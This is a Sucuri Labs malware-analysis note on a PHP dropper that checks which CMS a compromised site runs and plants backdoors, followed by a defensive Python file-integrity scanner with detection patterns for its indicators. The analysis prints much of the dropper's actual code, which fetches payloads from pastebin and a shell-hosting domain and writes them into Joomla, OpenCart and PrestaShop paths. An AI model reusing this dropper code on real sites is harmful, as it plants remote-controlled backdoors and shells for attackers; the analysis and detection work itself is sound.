Labs Note

Backdoor Shell Dropper Deploys CMS-Specific Malware

October 6, 2020, by Krasimir Konov


The large majority of the malware we find on compromised websites consists of backdoors that allow an attacker to maintain unauthorized access to the site and execute whatever commands they want.

Another common scenario involves malware that is injected directly into a website’s files and used to redirect traffic, steal credit cards and other sensitive information, hijack resources to mine cryptocurrencies, or even serve unwanted ads.

In this case, the attacker uploaded what we suspect to be a malicious dropper of Turkish origin — the code comments are written in Turkish and, when translated, indicate an intent to inject additional pieces of malware into the site.

One interesting aspect of this sample is that the code checks which CMS is installed (WordPress, Joomla, OpenCart, PrestaShop) and deploys malware tailored to the environment it finds.

@chmod($_SERVER['DOCUMENT_ROOT'] . "/wp-load.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/index.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/index.php", 0644);
@chmod($_SERVER['DOCUMENT_ROOT'] . "/.htaccess", 0644);
function http_get($url){
        $im = curl_init($url);
        curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
        curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
        curl_setopt($im, CURLOPT_HEADER, 0);
        return curl_exec($im);
        curl_close($im);
}
$hector77734 = $_SERVER['DOCUMENT_ROOT'] . "/indeeex.php" ; /**/
$hectortxt77734 = http_get('https://pastebin[.]com/raw/t4PchdWx');
@$open77734 = fopen($hector77734, 'w');
@fwrite($open77734, $hectortxt77734);
@fclose($open77734);

The code first attempts to change the permissions of a few core files (wp-load.php, index.php and .htaccess) to 0644, then uses a cURL request through http_get() to fetch additional content from a pre-defined pastebin link. The malware then writes that content into indeeex.php using fwrite().

Next, the dropper targets different CMSs — starting with Joomla — by using file_exists() to confirm whether the core file “/includes/defines.php” is present.

If it is, the dropper writes administrator/systeam.php from another pastebin link and downloads additional files (joomlahide.zip and joomla.zip) from shellx[.]org:

$jooomla = $_SERVER['DOCUMENT_ROOT'] . "/includes/defines.php";
if (file_exists($jooomla)) {
$hector5 = $_SERVER['DOCUMENT_ROOT'] . "/administrator/systeam.php";
$hectortxt5 = http_get('https://pastebin[.]com/raw/sv5Bf4gv');
@$open5 = fopen($hector5, 'w');
@fwrite($open5, $hectortxt5);
@fclose($open5);

@copy('hxxp://shellx[.]org',$_SERVER['DOCUMENT_ROOT']."/administrator/help/joomlahide.zip");
@copy('hxxp://shellx[.]org/',$_SERVER['DOCUMENT_ROOT']."/administrator/help/joomla.zip");


These zips contain two other files: a file uploader backdoor and the An0n_3xPloiTeR shell.

For the other CMSs, the dropper uses the same method: it checks whether specific core files exist and then downloads additional content from shellx[.]org.

OpenCart

/* FROM HERE DOWN OPENCART (original comment in Turkish: "BURDAN Aşşağı OPENCART") */
$oopencart = $_SERVER['DOCUMENT_ROOT'] . "/system/config/";
if (file_exists($oopencart)) {

$hector44441 = $_SERVER['DOCUMENT_ROOT'] . "/catalog/view/heck.php" ;
$hectortxt44441 = http_get('https://pastebin[.]com/raw/sv5Bf4gv');
@$open44441 = fopen($hector44441, 'w');
@fwrite($open44441, $hectortxt44441);
@fclose($open44441);

Prestashop

/* FROM HERE DOWN petrashop (original comment in Turkish: "BURDAN aşşağı petrashop") */
$pretashop = $_SERVER['DOCUMENT_ROOT'] . "/config/smarty.config.inc.php";
if(file_exists($pretashop)){
mkdir($_SERVER['DOCUMENT_ROOT'] . "/modules/petra/");
$hector4 = $_SERVER['DOCUMENT_ROOT'] . "/modules/petra/image.php" ;
$hectortxt4 = http_get('https://pastebin[.]com/raw/9jDX17nP');
$open4 = fopen($hector4, 'w');
fwrite($open4, $hectortxt4);
fclose($open4);

These types of malicious droppers are often hard to detect because their goal is not to directly execute a backdoor, remote shell, or file upload. Instead, they act as a bridge between the attacker and the other malicious resources they want to place on the website.

One of the best ways to mitigate risk and identify malicious behavior is to use a file integrity monitoring system that detects and alerts on content tampering.
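As an added example (not Sucuri's code and not the dropper's), the following Python script shows what such a check looks like in practice: it baselines a webroot, reports new, modified and permission-changed files, and flags changed PHP files that carry the dropper's indicators described above (a cURL fetch, a pastebin raw URL, fwrite()/copy() into the webroot, and file_exists() probes for CMS core files). The webroot, the sample dropper text and the paste id are constructed placeholders.

```python
import hashlib, re, stat, tempfile
from pathlib import Path
# Indicators taken from the dropper quoted above: cURL fetch, pastebin raw URL, fwrite()/copy() into the webroot, CMS core-file probes.
DROPPER_INDICATORS = {
    "remote_fetch": re.compile(r"curl_init\s*\("),
    "paste_raw_url": re.compile(r"pastebin\.com/raw/"),
    "webroot_write": re.compile(r"fwrite\s*\(|copy\s*\(\s*['\"]https?://"),
    "cms_probe": re.compile(r"file_exists\s*\(.*(defines\.php|smarty\.config\.inc\.php|wp-load\.php)"),
}

def snapshot(root):
    """Baseline: relative path -> (sha256 hex, permission bits) for every regular file under root."""
    snap = {}
    for p in Path(root).rglob("*"):
        st = p.lstat()
        if stat.S_ISREG(st.st_mode):
            snap[str(p.relative_to(root))] = (hashlib.sha256(p.read_bytes()).hexdigest(), stat.S_IMODE(st.st_mode))
    return snap

def dropper_indicators(source):
    """Names of the dropper indicators present in one PHP source string."""
    return [n for n, rx in DROPPER_INDICATORS.items() if rx.search(source)]

def scan_changes(root, before):
    """Diff a fresh snapshot against the baseline; added/modified PHP files with >= 2 indicators are flagged."""
    after = snapshot(root)
    report = {"added": sorted(set(after) - set(before)),
              "modified": sorted(p for p in before if p in after and before[p][0] != after[p][0]),
              "perm_changed": sorted(p for p in before if p in after and before[p][1] != after[p][1]),
              "suspicious": {}}
    for rel in report["added"] + report["modified"]:
        if rel.endswith(".php"):
            hits = dropper_indicators(Path(root, rel).read_text(errors="replace"))
            if len(hits) >= 2:
                report["suspicious"][rel] = hits
    return report

# Constructed sample mirroring the dropper's structure; the paste id is a placeholder, not a real paste.
SAMPLE_DROPPER = """<?php function http_get($u){$im=curl_init($u);return curl_exec($im);}
$f=fopen($_SERVER['DOCUMENT_ROOT']."/indeeex.php",'w');fwrite($f,http_get('https://pastebin.com/raw/PLACEHOLDER'));
if(file_exists($_SERVER['DOCUMENT_ROOT']."/includes/defines.php")){}"""
def demo():  # constructed webroot: take a baseline, replay the dropper's chmod and file drop, then scan
    root = tempfile.mkdtemp()
    index = Path(root, "index.php")
    index.write_text("<?php echo 'clean';")
    index.chmod(0o444)                                    # hardened baseline permissions
    before = snapshot(root)
    index.chmod(0o644)                                    # the dropper's @chmod(..., 0644)
    Path(root, "indeeex.php").write_text(SAMPLE_DROPPER)  # the dropped indeeex.php
    return scan_changes(root, before)
```

Running demo() reports index.php as permission-changed (its content hash is unchanged) and indeeex.php as a newly added file matching all four indicators; in a real deployment the baseline would be stored outside the webroot and the scan run on a schedule.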


About Krasimir Konov

Krasimir Konov is Sucuri's Malware Analyst who joined the company in 2014. Krasimir's main responsibilities include analyzing malicious code, signature creation and documentation of malware. His professional experience covers more than 10 years in the IT field, with nine years involved in IT/cyber security. When he’s not analyzing malware or writing Labs notes, you might find Krasimir riding his motorcycle and traveling the world. Connect with him on Twitter or LinkedIn.
